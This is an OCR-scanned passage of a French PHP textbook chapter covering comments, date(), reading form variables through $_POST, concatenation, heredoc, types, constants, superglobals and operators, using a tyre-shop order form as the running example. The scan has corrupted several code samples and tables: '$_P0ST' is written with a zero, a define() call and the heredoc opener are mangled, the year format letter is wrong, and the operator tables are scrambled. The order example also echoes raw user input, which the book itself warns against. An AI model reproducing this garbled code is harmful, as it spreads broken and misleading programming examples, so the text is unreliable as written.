soit dans le style des scripts shell : 

echo ' <p>Commande traitee.'; # Debut de l'affichage 

Avec ces deux dernier s styles, tout le texte place apres le symbole de commentaire (# ou 
/ / ) est considere comme du commentaire tant que la fin de la ligne ou la balise PHP de 
cloture n'a pas ete atteinte. 

Dans la ligne de code suivante, le texte avant la balise fermante, voici un commen 
taire, fait partie d'un commentaire. Le texte apres la balise fermante, pas ici, est 
traite comme du HTML parce qu'il se trouve apres la balise fermante : 

// voici un commentaire ?> pas ici 

Ajout de contenu dynamique 

Jusqu'ici, tout ce que nous avons code en PHP aurait tout aussi bien pu etre code en 
HTML, avec le meme resultat. 

Le principal interet d'un langage de script cote serveur reside dans la creation de 
contenu dynamique. II s'agit la d'un atout important, parce qu'un contenu se modifiant 
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pour s'adapter aux besoins de chaque utilisateur, ou en fonction du temps, incite les 
internautes a revenir sur votre site. Le langage PHP permet facilement de mettre en 
ceuvre un tel effet dynamique. 

Commencons par un exemple simple. Remplacez le code PHP precedemment insere 
dans le fichier processorder.php par le code suivant : 

<?php 

echo ' <p>Commmande traitee a '; 
echo date('H:i, \l\e j-m-Y'); 
echo ' </p> ' ; 

?> 

Dans ce fragment, nous nous servons de la fonction date ( ) predefinie du langage PHP 
pour indiquer au client la date et l'heure du traitement de sa commande. L'affichage qui 
en resulte sera different a chaque nouvelle execution du script. La Figure 1.3 montre un 
exemple de l'affichage genera par l'execution du script. 



Figure 1.3 

La fonction PHP date() 
renvoie une chafne 
de date mise en forme. 



Le garage de Bob - Resultats de ... CD 



Le garage de Bob 
Resultats de la commande 

Commande trailec a 18:31, lc 6-10-2008 



Appel de fonctions 

Examinez l'appel de la fonction date ( ) dans le fragment de code considere ici. L' appel 
a ete realise avec la syntaxe standard. Le langage PHP comprend une riche bibliotheque 
de fonctions pour le developpement d' applications web et la plupart de ces fonctions 
requierent que des donnees leur soient passees pour renvoyer un resultat. 

Soit l'appel de fonction suivant : 

date( 'H:i, \l\e j-m-Y' ) 

Notez qu'une chaine (des donnees textuelles) est passee a la fonction dans une paire de 
parentheses. L'element entre les parentheses est appele le parametre, ou argument de la 
fonction. Ces arguments constituent les entrees utilisees par la fonction pour generer le 
resultat specifique attendu. 
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Fonction date() 

La fonction date ( ) attend que le parametre qui lui est passe soit une chaine de format, 
specifiant le style voulu pour la sortie. Chacune des lettres de la chaine represente une 
partie de la date et de l'heure. H est l'heure dans un format sur 24 heures avec des zeros 
d'en-tete si necessaire, i represente les minutes avec un zero d'en-tete si necessaire, 
j represente le jour du mois sans zero d'en-tete, m represente le numero du mois et 
J represente l'annee, sous un format a quatre chiffres. Les caracteres precedes d'un 
antislash representent du texte litteral (vous trouverez la liste complete des formats pris 
en charge par la fonction date ( ) au Chapitre 19). 

Acces aux variables des formulaires 

Le principal objectif d'un formulaire de commande est la collecte des informations 
relatives aux commandes des clients. Recuperer les donnees saisies par le client dans un 
tel formulaire se revele tres facile avec PHP mais la methode employee depend de la 
version que vous utilisez et d'un parametrage dans votre fichier php.ini. 

Variables des formulaires 

Dans votre script PHP, vous pouvez acceder a chacun des champs d'un formulaire par le 
biais de variables dont les noms font reference au nom du champ de formulaire associe. 
Dans le langage PHP, les noms de variables sont reconnaissables du fait de la presence du 
prefixe dollar ($). L'oubli du signe dollar constitue une erreur de programmation courante. 

En fonction de votre version et de votre installation PHP, vous disposez de trois manieres 
pour acceder aux donnees d'un formulaire via des variables. Ces methodes ne portent 
pas de noms officiels, c'est pourquoi nous les avons appelees les styles "abrege", 
"medium" et "long". Dans tous les cas, il est possible d' acceder dans le script a chacun 
des champs de formulaire soumis au script. 

Vous pouvez acceder au contenu du champ qte pneus des manieres suivantes : 

$qte_pneus // style abrege 

$_P0ST[ ' qte_pneus ' ] // style medium 

$HTTP_POST_VARS[ 'qte_pneus' ] // style long 

Dans cet exemple, ainsi que dans tout le reste de cet ouvrage, nous avons adopte le 
style medium de referencement des variables de formulaire (autrement dit, 
$ P0ST[ ' qte pneus ' ]), mais nous creons des versions abregees des variables pour des 
raisons de commodite (cette approche est recommandee depuis PHP 4.2.0). 

Pour vos programmes personnels, vous pouvez choisir une approche differente mais 
vous devez etre conscient des enjeux ; c'est pourquoi nous presentons des maintenant 
les differentes methodes. 
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En bref : 

■ Si le style abrege ($qte pneus) est pratique, il exige que le parametre de configuration 
register globals soit active. Son activation ou sa deactivation par defaut depend de 
la version de PHP. Dans toutes les versions depuis 4.2.0, il a ete desactive par defaut. 
Ce style favorisant les erreurs susceptibles de rendre votre code vulnerable aux atta- 
ques, il est desormais deconseille. Ce serait de toute facon une mauvaise idee de l'utili- 
ser dans du nouveau code car il y a de fortes chances pour qu'il disparaisse en PHP 6. 

■ Le style medium ($ P0ST['qte pneus ']) est maintenant l'approche recommandee. 
II est assez pratique mais n'est apparu qu'avec PHP 4.1.0 ; il ne fonctionnera done 
pas sur de tres anciennes installations. 

I Le style long ($HTTP POST VARS['qte pneus']) est le plus "bavard". Notez 
cependant qu'il a ete declare obsolete (deprecated) et qu'il est en consequence 
vraisemblable qu'il disparaitra dans le long terme. Ce style etait auparavant le 
plus portable mais peut maintenant etre desactive via la directive de configuration 
register long arrays, qui ameliore les performances. La aussi, il est deconseille 
de l'utiliser dans du nouveau code, sauf si Ton a de tres bonnes raisons de penser 
que le script sera installe sur un serveur ancien. 

Lorsqu'on emploie le style abrege, les variables du script portent les memes noms que 
les champs du formulaire HTML, e'est pourquoi il n'est pas necessaire de declarer les 
variables ou d'entreprendre quoi que ce soit pour les creer dans le script. Les variables 
sont passees au script de la meme facon que des arguments le sont a une fonction. Avec 
le style abrege, on peut done se contenter d'utiliser une variable comme $qte pneus car 
le champ du formulaire la cree automatiquement dans le script de traitement. 

Ce type d'acces pratique aux variables est attrayant mais, avant d'activer 
register globals, il convient de s'interesser aux raisons pour lesquelles l'equipe 
chargee du developpement de PHP l'a desactivee. 

Le fait de pouvoir acceder directement aux variables est tres pratique mais cela facilite 
1' apparition d' erreurs de programmation susceptibles de compromettre la securite de 
vos scripts. Lorsque les variables d'un formulaire deviennent automatiquement des 
variables globales, il n'y a plus de separation evidente entre les variables creees par le 
programmeur et les variables douteuses directement envoyees par l'utilisateur. 

Si vous ne prenez pas la precaution de donner a toutes vos variables une valeur initiale, 
les utilisateurs de vos scripts peuvent done passer des variables et des valeurs, sous la 
forme de variables de formulaire, qui se melangeront aux votres. En consequence, si 
vous choisissez le style abrege pour acceder aux variables, vous devez vous assurer de 
donner une valeur initiale a vos variables. 

Le style medium implique la recuperation des variables de formulaire a partir d'un 
des tableaux $ POST, $ GET ou $ REQUEST. Un tableau $ GET ou $ POST contiendra 
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tous les details de toutes les variables du formulaire. Le choix du tableau depend de 
la methode (GET ou POST, respectivement) utilisee pour l'envoi du formulaire. 
En outre, une combinaison de toutes les donnees envoyees via POST ou GET sera dispo- 
nible par le biais de $ REQUEST. 

Si le formulaire utilise la methode POST, la valeur entree dans le champ qte pneus sera 
enregistree dans $ POST [ ' qte pneus ' ] . Si c'est la methode GET qui est employee, cette 
valeur sera contenue dans $ GET[ 'qte pneus' ]. Dans les deux cas, la valeur sera 
disponible dans $ REQUEST! 'qte pneus']. 

Ces tableaux font partie des tableaux "superglobaux", dont nous reparlerons lorsque 
nous evoquerons la portee des variables. 

Si vous utilisez une version tres ancienne de PHP, il est possible que vous n'ayez pas 
acces aux tableaux $ POST ou $ GET : dans les versions anterieures a la 4.1.0, les 
memes informations etaient enregistrees dans des tableaux appeles $HTTP POST VARS et 
$HTTP GET VARS. C'est ce que nous appelons le style long. Comme nous l'avons indi- 
que precedemment, ce style a ete declare "obsolete". II n'y a pas d'equivalent au tableau 
$ REQUEST dans ce style. 

Avec le style long, vous pouvez acceder a la reponse de l'utilisateur via 
$HTTP POST VARS['qte pneus ' ] ou $HTTP GET VARS['qte pneus']. 

Les exemples dans ce livre ont ete testes avec la version 5.2 de PHP et ils seront parfois 
incompatibles avec des versions de PHP anterieures a la version 4. 1.0. C'est pourquoi nous 
vous recommandons d'utiliser, dans la mesure du possible, une version recente de PHP. 

Prenons un autre exemple. Le style medium de referencement des variables utilisant un 
type de variable appele tableau (lesquels ne seront vraiment etudies qu'au Chapitre 3), 
nous commencerons l'ecriture du script en creant des copies de variables plus faciles a 
manipuler. 

Pour copier la valeur d'une variable dans une autre, servez-vous de l'operateur d'affec- 
tation, qui, en PHP, est le signe "egal" (=). La ligne de code suivante cree une nouvelle 
variable appelee $qte pneus et y copie le contenu de $ P0ST[ ' qte pneus ' ] : 

$qte_pneus = $_P0ST[ ' qte_pneus ' ] ; 

Inserez le bloc de code qui suit au debut du script. Tous les autres scripts presentes dans 
ce livre et qui traitent des donnees issues de formulaire commenceront par un bloc du 
meme genre. Ce bloc ne generant pas de sortie, il importe peu qu'il soit place avant ou 
apres la balise <html> ou les autres balises HTML du debut de votre page. En general, 
nous le placons au tout debut du script afm qu'il soit facilement reperable. 

<?php 

// Cree des noms de variables abregees 
$qte_pneus = $_P0ST[ ' qte_pneus ' ] ; 
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$qte_huiles = $_POST[ ' qte_huiles ' ] ; 
$qte_bougies = $_POST[ ' qte_bougies ' ] ; 

?> 

Ce code cree trois nouvelles variables ($qte pneus, $qte huiles et $qte bougies) et 
les definit de maniere qu'elles contiennent les donnees envoyees via la methode POST 
du formulaire. 

Pour que le script ait un effet visible, ajoutez les lignes de code suivantes a la fin de 
votre script PHP : 

echo ' <p>Recapitulatif de votre commande :</p>'; 

echo $qte_pneus . ' pneus<br />'; 

echo $qte_huiles . ' bidons d\'huile<br />'; 

echo $qte_bougies . ' bougies<br />'; 

A ce stade, vous n'avez pas verifie le contenu des variables afin de vous assurer que les 
valeurs entrees dans chaque champ de formulaire soient coherentes. Essayez d'entrer 
de maniere deliberee des donnees erronees et observez ce qui se passe. Apres avoir lu la 
suite de ce chapitre, vous souhaiterez peut-etre ajouter a ce script du code pour la vali- 
dation des donnees. 



— Attention 

Utiliser directement les donnees de I'utilisateur pour les afficher dans le navigateur comme 
ici est une operation risquee du point de vue de la securite. Vous devriez filtrer ces donnees 
comme on I'explique au Chapitre 4. Les problemes de securite sont presentes au Chapitre 14. 



Si vous chargez le fichier ainsi cree dans votre navigateur, le script affichera une sortie 
comme celle de la Figure 1.4. Les valeurs affichees dependent evidemment de celles 
qui ont ete entrees dans le formulaire. 



Figure 1.4 

Les variables saisies 
par I'utilisateur dans le 
formulaire sont facile- 
ment accessibles dans 
processorder.php. 



O Le garage de Bob - Resultats d... CD 



GUT- QD C^;^ • dF 



Le garage de Bob 
Resultats de la commande 

Commande traitde a 18:33, lc 6-10-2008 
Rccapitulatif de votre commande : 
2 pneus 

1 bidons d'huile 

2 bougies 
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Les quelques points interessants a relever a propos de cet exemple sont examines dans 
les sous-sections qui suivent. 

Concatenation de chaines 

Dans ce script, la fonction echo sert a afficher la valeur saisie par l'utilisateur dans 
chacun des champs du formulaire, suivie d'un texte indiquant la signification de la 
valeur affichee. Examinez attentivement les instructions echo : le nom de la variable et 
le texte qui le suit sont separes par un point ( .), comme dans la ligne de code suivante : 

echo $qte_pneus . ' pneus<br>'; 

Le caractere point represente ici l'operateur de concatenation de chaines et s' utilise 
pour accoler des chaines de caracteres (des fragments de texte) les unes aux autres. 
Vous y aurez souvent recours lorsque vous enverrez au navigateur des donnees en sortie 
avec echo car la concatenation de chaines permet d'eviter la repetition des commandes 
echo. 

Toutes les variables simples peuvent egalement etre inserees dans des chaines enca- 
drees par des apostrophes doubles passees a la fonction echo (les tableaux sont plus 
delicats a prendre en charge et c'est pourquoi nous nous interesserons a la combinaison 
des tableaux et des chaines au Chapitre 4). 

Par exemple : 

echo "$qte_pneus pneus<br />"; 

Cette ligne equivaut a 1' instruction presentee plus haut. Chacun de ces deux formats est 
correct et le choix de l'un ou l'autre est surtout une affaire de gout personnel. Le 
processus qui consiste a remplacer un nom de variable par sa valeur dans une telle 
chaine est appele "interpolation". Cette fonctionnalite est specifique aux chaines entre 
apostrophes doubles : elle ne fonctionne pas avec les chaines entre apostrophes simples 
de cette maniere. Si vous executez la ligne de code suivante : 

echo '$qte_pneus pneus<br />'; 

le navigateur affichera simplement "$qte pneus pneus<br />". Lorsque la variable est 
encadree par des apostrophes doubles, son nom est remplace par sa valeur. Si elle est 
placee entre des apostrophes simples, son nom, ou tout autre texte, est envoye tel quel 
au navigateur. 

Variables et litteraux 

La variable et la chaine concatenees l'une avec l'autre dans chacune des instructions 
echo sont deux entites de nature differente. Une variable est un symbole representant 
des donnees, tandis qu'une chaine constitue les donnees elles-memes. Lorsque des 
donnees brutes sont specifiees directement dans un programme, comme c'est le cas 
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dans l'exemple considere ici, les donnees sont qualifiers de "litterales", pour marquer la 
difference avec une variable. $qte pneus est une variable, c'est-a-dire un symbole desi- 
gnant les donnees saisies par le client. En revanche, ' pneus<br /> ' est un litteral (cette 
chaine n'a pas besoin d'etre interpretee pour etre envoyee au navigateur). 

Nous n'en avons pas tout a fait fini sur ce point. Dans la derniere instruction citee, PHP 
remplace dans la chaine le nom de variable $qte pneus par la valeur stockee dans la 
variable. 

Nous avons deja mentionne deux types de chaines : celles encadrees par des apostro- 
phes doubles et celles encadrees par des apostrophes simples. PHP tente d'evaluer les 
chaines entre apostrophes doubles, ce qui conduit au resultat du traitement de l'instruc- 
tion precedente. Les chaines placees entre apostrophes simples sont traitees comme des 
litteraux. 

II existe egalement un troisieme type de chaine : les "documents sur place". Leur 
syntaxe («<) est familiere aux utilisateurs de Perl et a ete ajoutee a PHP 4. Elle permet 
de specifier des chaines longues de maniere soignee, en utilisant un marqueur de fin qui 
sera utilise pour terminer la chaine. L'exemple suivant cree et affiche une chaine de trois 
lignes : 

echo «<FIN 

ligne 1 

ligne 2 

ligne 3 
FIN 

Le lexeme FIN est entierement arbitraire, mais il ne doit pas apparaitre dans le contenu 
de la chaine. Pour fermer un document sur place, il suffit de placer le lexeme au debut 
d'une ligne. 

Les documents sur place sont interpoles, comme les chaines entre apostrophes doubles. 

Identificateurs 

Les noms des variables sont des identificateurs (tout comme les noms de fonctions et de 
classes - les fonctions et les classes sont traitees aux Chapitres 5 et 6). Le choix des 
identificateurs doit etre effected en respectant quelques regies simples : 

I La longueur d'un identificateur n'est pas limitee. Un identificateur peut se composer 
de lettres, de nombres et de blancs soulignes. 

■ Un identificateur ne peut pas commencer par un chiffre. 

■ En PHP, les identificateurs sont sensibles a la casse (a la presence de minuscules et 
de majuscules). $qte pneus est un identificateur different de $Qte Pneus. Le non- 
respect de la casse constitue une erreur de programmation commune. Les noms des 
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fonctions font exception a cette regie puisqu'ils peuvent etre orthographies sans 
respect de la casse. 

■ Une variable peut porter le meme nom qu'une fonction. Cette pratique est toutefois 
deconseillee parce qu'elle prete a confusion. Par ailleurs, vous ne pouvez pas creer 
une fonction portant le meme nom qu'une autre fonction. 

Creation de variables 

Vous pouvez declarer et utiliser vos propres variables en plus des variables passees au 
script a partir du formulaire HTML. 

L'une des particularites de PHP est qu'il n'est pas necessaire de declarer des variables 
avant de les utiliser. Une variable est automatiquement creee lorsqu'une valeur lui est 
affectee pour la premiere fois (voir la section suivante pour plus de details a ce sujet). 

Affectation de valeurs a des variables 

L' affectation de valeurs a des variables s'effectue au moyen de l'operateur d'affectation 
=. Sur le site de Bob, nous devons calculer le nombre total d' articles commandes, ainsi 
que le montant total de la commande. Pour stacker ces nombres, nous pouvons creer 
deux variables, que nous initialiserons a la valeur zero. 

Ajoutez les lignes de code qui suivent a la fin de votre script PHP : 

$qte_totale = 0; 
$montant_total = 0.00; 

Chacune de ces instructions cree une variable et lui affecte une valeur litterale. II est 
egalement possible d'affecter la valeur d'une variable a une autre variable, comme le 
montrent les instructions suivantes : 

$qte_totale = 0; 
$montant_total = $qte_totale; 

Types des variables 

Le type des variables fournit une indication de la nature des donnees qui y sont conser- 
vees. PHP fournit plusieurs types de donnees. Diverses donnees peuvent etre stockees 
dans differents types de donnees. 

Types de donnees du PHP 

Le langage PHP prend en charge les types de donnees de base suivants : 

■ Entier. Utilise pour les nombres entiers. 

■ Flottant (aussi appele Double). Utilise pour les nombres reels. 
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■ Chaine. Utilise pour les chaines de caracteres. 

■ Booleen. Utilise pour exprimer les valeurs vraies ou fausses. 

■ Tableau. Utilise pour stocker plusieurs elements de donnees de meme type (voir 
Chapitre 3). 

■ Objet. Utilise pour stocker des instances de classes (voir Chapitre 6). 

II existe egalement deux types speciaux : NULL et ressource. Les variables auxquelles 
il n'a pas ete donne de valeur specifique, celles qui sont considerees comme non defi- 
nies et celles auxquelles il a ete affecte la valeur specifique NULL sont considerees 
comme etant du type NULL. Certaines fonctions predefinies (comme les fonctions de 
base de donnees) retournent des variables du type ressource : elles represented des 
ressources externes (comme des connexions de base de donnees). II est extremement 
rare que Ton soit amene a manipuler directement une variable du type ressource, mais 
elles sont frequemment renvoyees par des fonctions et doivent etre passees comme 
parametres a d'autres fonctions. 

Interet du typage 

On dit que PHP est un langage faiblement type ou qu'il utilise un typage dynamique. 
Dans la plupart des langages de programmation (C, par exemple), une variable ne 
peut appartenir qu'a un seul type de donnees, qui doit etre precise avant toute utilisa- 
tion de la variable. En PHP, le type d'une variable est determine par la valeur qui lui est 
affectee. 

Lorsque nous avons cree $qte totale et $montant total, par exemple, leurs types 
initiaux ont ete determines lors de l'execution des instructions suivantes : 

$qte_totale = 0; 
$montant_total = 0.00; 

La valeur entiere ayant ete affectee a la variable $qte totale, celle-ci prend le type 
entier. Selon la meme logique, $montant total est de type flottant. 

Bien que cela puisse sembler etrange, nous pourrions ajouter la ligne suivante a notre 
script : 

$montant_total = 'Bonjour'; 

La variable $montant total serait alors de type chaine car PHP adapte le type de 
chaque variable aux donnees qui y sont contenues, a chaque instant. 

Cette capacite du langage PHP a modifier les types des variables "a la volee" peut se 
reveler extremement utile. Souvenez-vous que PHP detecte "automatiquement" le type 
des donnees stockees dans chaque variable et qu'il renvoie par consequent toujours les 
donnees avec le type approprie, lorsque vous recuperez le contenu d'une variable. 
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Transtypage 

Si PHP est un langage faiblement type, il donne neanmoins la possibilite de forcer le 
type d'une valeur ou d'une variable par un transtypage (casting). Le principe est identi- 
que au transtypage du langage C. II suffit de specifier le type temporaire entre parentheses, 
juste avant la variable concernee. 

Nous pourrions ainsi declarer les deux variables citees precedemment, $qte_totale et 
$montant_total, en effectuant un transtypage comme suit : 

$qte_totale = 0; 

$montant_total = (double)$qte_totale; 

L'interpreteur PHP analyse la seconde instruction de la maniere suivante : "Prendre la 
valeur stockee dans $qte_totale, l'interpreter comme une variable de type flottant 
et la stacker dans $montant_total". La variable $montant_total prend alors le type 
flottant. Le transtypage n'affectant pas les types des variables soumises au transtypage, 
$qte_totale reste de type entier. 

Variables dynamiques 

PHP admet un autre type de variable : les variables dynamiques. Celles-ci permettent 
de changer les noms des variables de maniere dynamique. 

Comme vous pouvez le constater, PHP autorise une grande souplesse pour manipuler 
les types et les noms de variables. Si tous les langages de programmation autorisent 
la modification du contenu des variables, seuls quelques-uns permettent de modifier le 
type d'une variable et rares sont les langages a autoriser la modification des noms 
de variables. 

Le principe d'une variable dynamique consiste a utiliser la valeur d'une variable 
comme nom d'une autre variable. Nous pourrions ecrire la ligne de code suivante : 

$nom_var = 'qte_pneus'; 

puis utiliser $$nom_var en lieu et place de $qte_pneus. Nous pourrions alors definir la 
valeur de $qte_pneus de la maniere suivante : 

$$nom_var = 5; 

ce qui est strictement equivalent a : 

$qte_pneus = 5; 

Ce concept peut sembler abscons, mais vous en saisirez mieux l'utilite lorsque nous 
l'appliquerons dans l'exemple donne dans la section consacree aux boucles for, un peu 
plus loin dans cet ouvrage. Plutot qu'enumerer et utiliser chaque variable d'un formu- 
laire separement, nous utiliserons une boucle et une meme variable pour traiter automa- 
tiquement toutes les variables du formulaire. 
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Constantes 

Comme nous l'avons mentionne plus haut, nous pouvons modifier la valeur stockee dans 
une variable. Nous pouvons egalement declarer des constantes. Tout comme une variable, 
une constante stocke une valeur mais, contrairement a une variable, cette valeur est fixee 
"une fois pour toutes" et ne peut plus etre modifiee a un autre endroit du script. 

Dans notre exemple du site de Bob, les prix des differents articles proposes a la vente 
pourraient etre stockes dans des constantes. La definition d'une constante s'effectue au 
moyen de la fonction define : 

define( 'PRIX_PNEUS' , 100); 
define ( ' PRIX_HUILES ' , 10); 
define ( ' PRIX_BOUGIES 1 , 4); 

Ajoutez ces lignes de code a votre script. Nous disposons a present de trois constantes 
qui peuvent etre utilisees pour calculer le total de la commande passee par le client. 

Vous remarquerez que tous les noms de constante sont ici specifies en majuscules. Cette 
convention est empruntee au langage C : elle permet de distinguer d'un coup d'oeil 
variables et constantes. Elle n'est pas obligatoire, mais fortement recommandee parce 
qu'elle facilite la lecture et la maintenance du code. 

Contrairement aux variables, les constantes ne sont pas prefixees par le caractere dollar. 
Pour utiliser la valeur d'une constante, il suffit de specifier son nom. Pour utiliser l'une 
des constantes creees precedemment, nous pourrions done ecrire : 

echo PRIX_PNEUS; 

Outre les constantes creees par le programmeur, PHP utilise un grand nombre de constantes 
predefinies. Pour en connaitre la liste, utilisez la fonction phpinf o( ) : 

phpinfo( ) ; 

L'appel a phpinfo fournit, entre autres, la liste de toutes les variables et constantes 
predefinies dans PHP. Nous etudierons et utiliserons plusieurs de ces constantes et 
variables dans la suite de cet ouvrage. 

L'une des autres distinctions entre les variables et les constantes tient a ce que les constantes 
ne peuvent stocker que des donnees de type booleen, entier, flottant ou chaine, e'est-a- 
dire des types scalciires. 

Portee des variables 

La "portee" d'une variable designe les emplacements au sein d'un script ou la variable 
est visible. Les six regies de portee de base dans PHP sont les suivantes : 

■ Les variables superglobales predefinies sont visibles a n'importe quel endroit d'un 
script. 
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■ Les constantes, une fois declarees, sont toujours visibles globalement ; autrement 
dit, elles peuvent etre utilisees a l'interieur et a l'exterieur de fonctions. 

■ Les variables globales declarees dans un script sont visibles dans tout le script, mais 
pas a l'interieur des fonctions. 

■ Une variable utilisee a l'interieur d'une fonction et qui est declaree comme etant 
globale fait reference a la variable globale de meme nom. 

■ Les variables creees a l'interieur de fonctions et declarees comme statiques sont 
invisibles en dehors de la fonction mais conservent leur valeur entre deux executions 
de la fonction (nous reviendrons sur ce mecanisme au Chapitre 5). 

■ Les variables creees a l'interieur d'une fonction sont locales a la fonction et cessent 
d'exister lorsque cette derniere se termine. 

A partir de PHP 4.2, les tableaux $ GET et $ POST ainsi que d'autres variables speciales 
utilisent des regies particulieres pour leur portee. Celles-ci sont appelees variables 
superglobales ou autoglobales et sont visibles a n'importe quel endroit du script, aussi 
bien a l'interieur qu'a l'exterieur des fonctions. 

Voici la liste complete des variables superglobales : 

a $GL0BALS. Tableau de toutes les variables globales (comme le mot-cle global, ce 
tableau vous permet d'acceder a des variables globales dans une fonction avec 
$GLOBALS['ma_variable'], par exemple). 

a $ SERVER. Tableau des variables d'environnement du serveur. 

■ $ GET. Tableau des variables passees au script par le biais de la methode GET. 

■ $ POST. Tableau des variables passees au script par le biais de la methode POST. 

■ $ COOKIE. Tableau des variables des cookies. 

■ $ FILES. Tableau des variables associees aux transferts de fichiers. 

■ $ ENV. Tableau des variables d'environnement. 

I $ REQUEST. Tableau de toutes les variables entrees par l'utilisateur, ce qui comprend 
les entrees de $ GET, $ POST et $ COOKIE (mais pas celles de $ FILES depuis 
PHP 4.3.0). 

■ $ SESSION. Tableau des variables de session. 

Nous etudierons chacune de ces variables a mesure de nos besoins et reviendrons plus 
en detail sur la notion de portee des variables lorsque nous examinerons les fonctions et 
les classes. Jusque-la, toutes les variables que nous utiliserons seront de portee globale. 
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Operateurs 

Les operateurs sont representes par des symboles et servent a manipuler des valeurs et 
des variables en les soumettant a des operations. Pour calculer les totaux et la taxe du 
bon de commande client de Bob, nous devons recourir a des operateurs. 

Nous avons deja mentionne deux operateurs : l'operateur de concatenation de chaines . 
et l'operateur d'affectation =. Dans les sections qui suivent, nous allons passer en revue 
la liste complete des operateurs disponibles en PHP. 

En general, les operateurs peuvent prendre un, deux ou trois arguments, la majorite 
d'entre eux prenant deux arguments. Par exemple, l'operateur d'affectation prend deux 
arguments : 1' emplacement de stockage a gauche du symbole = et une expression, 
placee a sa droite. Ces arguments sont appeles operandes. Un operande est un element 
auquel s' applique l'operateur. 

Operateurs arithmetiques 

Les operateurs arithmetiques de PHP sont tres simples : il s'agit en fait des operateurs 
mathematiques traditionnels. Le Tableau 1.1 enumere les operateurs arithmetiques. 

Tableau 1.1 : Operateurs arithmetiques de PHP 



Operateur Nom Exemple 



+ 


Addition 


$a 


+ 


$b 




Soustraction 


$a 




$b 


* 


Multiplication 


$a 


* 


$b 


1 


Division 


$a 


/ 


$b 


'O 


Modulo 


$a 


'0 


$b 



Avec chacun de ces operateurs, nous pouvons stocker le resultat de 1' operation, comme 
ici : 

$resultat = $a + $b; 

L addition et la soustraction fonctionnent comme nous pouvons nous y attendre. Ces 
operateurs effectuent respectivement 1' addition et la soustraction des valeurs stockees 
dans les variables $a et $b. 

L'operateur de soustraction ( ) s'utilise egalement comme operateur unaire (c'est-a- 
dire un operateur qui ne prend qu'un seul argument ou operande) pour indiquer des 
nombres negatifs, comme dans 1' exemple suivant : 

$a = -1 ; 
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Le fonctionnement de la multiplication et de la division est lui aussi conforme au fonc- 
tionnement attendu. Notez l'usage du caractere asterisque (*) pour l'operateur de multi- 
plication au lieu du symbole classique de multiplication et l'usage de la barre oblique 
pour l'operateur de division, au lieu du symbole classique de la division. 

L'operateur modulo renvoie le reste de la division de la variable $a par la variable $b. 
Soit le fragment de code suivant : 

$a = 27; 
$b = 10; 

$resultat = $a % $b; 

La valeur stockee dans la variable $resultat est le reste obtenu apres division de 27 par 
10, c'est-a-dire 7. 

Les operateurs arithmetiques sont generalement appliques a des entiers ou a des 
nombres reels (doubles). Lorsqu'ils sont appliques a des chaines, l'interpreteur PHP 
tente de convertir les chaines en nombres. Lorsque les chaines contiennent un "e" ou un 
"E", PHP les lit comme etant en notation scientifique et les convertit en nombres reels ; 
sinon il les convertit en nombres entiers. PHP examine si la chaine commence par des 
chiffres et, si c'est le cas, les utilise comme valeur numerique. Si ce n'est pas le cas, 
l'interpreteur PHP considere que la valeur de la chaine est zero. 

Operateur de chaines 

Nous avons deja vu et utilise l'unique operateur de chaine admis par PHP : l'operateur 
. de concatenation de chaines. Cet operateur s'emploie pour accoler deux chaines l'une 
a 1' autre. II genere et stocke son resultat a la maniere de l'operateur d' addition. 

$a = "Le garage " ; 
$b = "de Bob"; 
$resultat = $a.$b; 

Apres l'execution de ces instructions, la variable $resultat contient la chaine Le 
garage de Bob. 

Operateurs d'affectation 

Nous avons deja evoque l'operateur d'affectation =. Cet operateur doit toujours etre 
designe comme etant l'operateur d'affectation et se lit "recoit". Ainsi : 

$qte_totale = 0; 

se lit "$qte totale recoit la valeur zero". Nous reviendrons sur ce point un peu plus 
loin dans ce chapitre, lorsque nous etudierons les operateurs de comparaison, mais si 
vous l'appelez "egal" vous risquez d'etre surpris. 
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Valeurs renvoyees par une affectation 

L'operateur d'affectation renvoie une valeur, comme les autres operateurs. Ainsi, 
l'execution de l'expression : 

$a + $b 

renvoie la valeur obtenue en ajoutant la variable $a a la variable $b. De la meme 
maniere, vous pouvez ecrire : 

$a = 0; 

La valeur renvoyee par cette expression est zero. 
Cette technique vous permet de former des expressions telles que : 
$b = 6 + ($a = 5) ; 

Cette expression initialise la variable $b a 11. Ce principe est vrai pour toutes les affec- 
tations : la valeur d'une instruction d'affectation est la valeur affectee a l'operande 
place a gauche de l'operateur. 

Lors de l'ecriture d'une expression arithmetique, vous pouvez employer des parentheses 
pour elever la priorite d'une sous-expression, comme dans la ligne de code donnee plus 
haut. Le principe est ici exactement le meme qu'en mathematiques. 

Operateurs combines a Vaffectation 

Outre l'operateur d'affectation, PHP admet tout un ensemble d'operateurs d'affectation 
combines. Chacun de ces operateurs se presente comme une possibilite abregee pour 
effectuer une operation specifique sur une variable et pour en affecter le resultat a cette 
variable. Ainsi, l'expression : 

$a += 5; 

est equivalente a l'expression : 

$a = $a + 5; 

II existe des operateurs combines a 1' affectation pour chaque operateur arithmetique et 
pour l'operateur de concatenation de chaine. 

Le Tableau 1.2 dresse une vue recapitulative de tous les operateurs combines a 1' affec- 
tation et indique leurs effets. 



Tableau 1.2 : Operateurs combines a I'affectation 



Operateur 


Exemple 


Equivalant a 


+= 


$a += $b 


$a = $a + $b 




$a = $b 


$a = $a $b 


* — 


$a *= Sb 


$a = $a * $b 
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Tableau 1.2 : Operateurs combines a I'affectation (suite) 



Ope rate ur 


Exemple 


Equivalant a 


1 = 


$a /= $b 


$a = $a / $b 


Q 

t> — 


$a %= $b 


$a = $a % $b 




$a .= $b 


$a = $a . $b 



Operateurs de pre/postincrementation et de pre/postdecrementation 

Les operateurs de pre/postincrementation (++) et de pre/postdecrementation ( ) sont 
equivalents aux operateurs += et =, a quelques details pres. 

Tous les operateurs d' incrementation ont deux effets : d'une part ils incrementent, 
d' autre part ils affectent une valeur. Soit les instructions suivantes : 

$a = 4; 
echo ++$a; 

La seconde instruction utilise l'operateur de preincrementation, ainsi nomine parce 
qu'il figure avant l'operande $a. Lorsque l'interpreteur PHP rencontre cet operateur, il 
commence par incrementer $a de 1 , puis il renvoie la valeur ainsi incrementee. Dans ce 
cas precis, $a est incrementee a la valeur 5, puis la valeur 5 est renvoyee et affichee. La 
valeur de l'expression complete est 5 (notez que la valeur stockee dans $a a bien ete 
modifiee : PHP ne se contente pas de retourner simplement $a + 1 ). 

Lorsque l'operateur ++ figure apres l'operande, il est qualine d'operateur de postincre- 
mentation. L'effet produit est different. Soit les instructions suivantes : 

$a=4; 

echo $a++; 

Dans ce cas, l'interpreteur PHP accomplit le traitement inverse : il renvoie et affiche 
d'abord la valeur de $a et ce n'est qu'ensuite qu'il l'incremente. La valeur de l'expres- 
